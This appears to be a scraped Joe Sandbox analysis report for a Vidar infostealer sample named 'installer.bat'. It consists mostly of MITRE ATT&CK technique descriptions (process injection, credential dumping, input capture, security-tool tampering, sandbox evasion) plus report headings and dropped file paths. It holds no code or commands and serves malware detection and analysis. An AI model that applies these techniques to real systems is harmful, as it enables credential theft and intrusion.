Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report installer.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\WTR1NG4W47G4\58GDTJ

C:\ProgramData\WTR1NG4W47G4\7G4EUK

C:\ProgramData\WTR1NG4W47G4\DJMYU3

C:\ProgramData\WTR1NG4W47G4\EC2DJWT0H

C:\ProgramData\WTR1NG4W47G4\GVS0HV

C:\ProgramData\WTR1NG4W47G4\JE3OPZ

Windows Analysis Report
installer.bat

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre